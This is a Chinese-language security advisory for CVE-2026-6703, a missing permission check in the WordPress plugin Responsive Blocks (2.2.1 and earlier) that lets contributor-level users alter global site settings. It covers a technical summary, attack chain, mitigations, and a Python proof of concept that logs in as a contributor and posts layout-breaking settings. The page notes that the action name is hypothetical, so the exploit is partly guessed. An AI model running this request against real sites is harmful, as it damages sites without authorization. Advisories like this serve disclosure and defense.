CVE-2026-6703 CVSS 4.3 中危

CVE-2026-6703 WordPress插件权限绕过漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6703

漏洞类型

权限绕过

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Responsive Blocks – Page Builder for Blocks & Patterns

漏洞概述

Responsive Blocks – Page Builder for Blocks & Patterns插件在2.2.1及之前版本中存在权限验证缺失漏洞。由于插件未能正确验证用户权限，导致拥有“投稿人”及以上权限的经过身份验证的攻击者可以修改全局站点配置。攻击者可借此更改自定义CSS设置、禁用特定模块、调整布局默认值（如内容宽度、容器间距）以及更改自动模块恢复行为，从而破坏站点的外观和功能完整性。

技术细节

该漏洞的核心原理在于插件后端设置保存逻辑中的权限校验机制存在缺陷。具体而言，受影响版本的插件在处理用于更新全局配置（例如自定义CSS开关、布局默认参数、模块禁用状态等）的请求时，仅验证了用户是否具有基本的“投稿人”权限（如edit_posts），而未正确验证用户是否拥有管理站点选项的高级权限（如manage_options）。攻击者首先以“投稿人”身份登录WordPress后台，随后构造特定的POST请求，将恶意的配置参数发送至插件的处理端点。由于校验逻辑薄弱，服务器会接受这些参数并更新数据库中的wp_options表，从而篡改全局站点设置。这种逻辑缺陷使得低权限用户能够越权操作，破坏网站前端展示及功能完整性。

攻击链分析

STEP 1

步骤1：获取低权限账号

攻击者在目标WordPress站点注册或获取一个具有“投稿人”及以上权限的账号。

STEP 2

步骤2：登录并获取会话

攻击者使用该账号登录系统，获取有效的Cookie和会话令牌。

STEP 3

步骤3：构造恶意请求

攻击者分析插件逻辑，构造包含恶意配置参数（如禁用CSS、修改宽度）的POST请求发送至插件的后台处理接口。

STEP 4

步骤4：越权修改配置

服务器因权限校验缺失接受了请求，更新了全局插件配置，导致网站前端样式或功能受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
login_url = "http://example.com/wp-login.php"
username = "contributor"
password = "password"

# 1. Establish session and authenticate as a low-privileged user
session = requests.Session()
login_data = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'redirect_to': 'http://example.com/wp-admin/'
}
session.post(login_url, data=login_data)

# 2. Prepare payload to exploit the authorization bypass
# The action name 'responsive_block_editor_addons_save_settings' is hypothetical based on the plugin structure
payload_data = {
    'action': 'responsive_block_editor_addons_save_settings',
    'security': 'some_nonce_value_if_required', # May be bypassed or obtained
    # Malicious configuration changes
    'settings[custom_css_enabled]': '0',         # Disable custom CSS
    'settings[content_width]': '10000px',       # Break layout
    'settings[disable_blocks]': 'core/paragraph' # Disable core blocks
}

# 3. Send the exploit request
response = session.post(target_url, data=payload_data)

# 4. Check result
if response.status_code == 200 and "success" in response.text:
    print("[+] Exploit successful! Global settings modified.")
else:
    print("[-] Exploit failed.")

影响范围

Responsive Blocks – Page Builder for Blocks & Patterns <= 2.2.1

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Responsive Blocks插件。或者通过服务器规则限制对/wp-admin/admin-ajax.php的访问，仅允许管理员IP或特定角色调用该插件相关的敏感接口。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表